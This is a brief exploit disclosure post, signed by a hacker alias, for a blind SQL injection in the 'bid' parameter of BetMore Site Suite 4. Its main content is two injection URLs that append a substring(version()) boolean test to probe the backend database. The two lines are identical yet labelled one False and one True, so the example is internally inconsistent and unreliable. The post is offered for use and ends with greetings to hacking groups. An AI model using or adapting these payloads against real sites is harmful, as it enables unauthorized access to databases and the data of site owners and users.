BetMore Site Suite 4 (bid) Blind SQL Injection Vulnerability

2011-01-16 10:15:41

[#] Script: BetMore Site Suite
[#] Version: 4
[#] Link:
[#] Author: BorN To K!LL - h4ck3r
[#] Contact: [email protected]
[#] 3xploit:

[#] 3xample:

/mainx_a.php?lngx=12&x=367&xid=2&bid=78222 and substring(version(),1,1)=4 // False ,,
/mainx_a.php?lngx=12&x=367&xid=2&bid=78222 and substring(version(),1,1)=4 // True ,,
[#] Greetings:
darkc0de's team , AsbMay's Group , w4ck1ng team , Q8 , and all muslims ..


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